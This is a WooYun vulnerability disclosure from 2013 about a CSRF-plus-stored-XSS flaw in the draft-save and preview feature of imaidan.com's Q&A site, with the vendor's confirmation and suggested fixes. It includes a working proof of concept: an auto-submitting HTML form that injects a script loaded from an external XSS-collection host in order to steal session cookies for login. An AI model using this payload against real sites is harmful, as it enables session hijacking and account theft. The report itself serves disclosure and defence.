当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-027409

漏洞标题:麦单网一个csrf和xss的综合利用留后门

相关厂商:imaidan.com

漏洞作者: 小胖胖要减肥

提交时间:2013-07-02 11:11

修复时间:2013-08-16 11:12

公开时间:2013-08-16 11:12

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-02: 细节已通知厂商并且等待厂商处理中
2013-07-02: 厂商已经确认,细节仅向厂商公开
2013-07-12: 细节向核心白帽子及相关领域专家公开
2013-07-22: 细节向普通白帽子公开
2013-08-01: 细节向实习白帽子公开
2013-08-16: 细节向公众公开

简要描述:

综合来说对xss大部分地方都有过滤,但是有一些自己x自己的地方没有过滤,也没有token,正常回复的地方都加了token

详细说明:

在麦单网信用卡百科网站上,一般回复是不允许带外链的

sql2.jpg


但是可以预览,正常回复都是有token,无法csrf,但是预览的时候没有token
我们可以构造poc

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<body>
<form id="wrhoooo" name="wrhoooo" action="http://ask.imaidan.com/?/account/ajax/save_draft/item_id-653__type-answer" method="post">
<input type="test" name="message" value='"></textarea><script src=http://xss.tw/989></script>' />
</form>
<script>
document.wrhoooo.submit();
</script>
</body>
</html>

漏洞证明:

然后对热门问题以一个连接的方式回复,当有人点击连接后

http://t.cn/zQvKzdV


sql3.jpg


这个草稿会永久保存,还是有影响等于是一个后门了,而且个人中心有草稿提示

sql4.jpg


获得的cookies,有phpsessid能登陆的

sql5.jpg

修复方案:

1 保存草稿也加一个token
2 回复预览的时候也做一下过滤
草稿虽然不发出来的,但是被人恶意利用了也不好

版权声明:转载请注明来源 小胖胖要减肥@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2013-07-02 12:57

厂商回复:

感谢关注,已着手处理!

最新状态:

暂无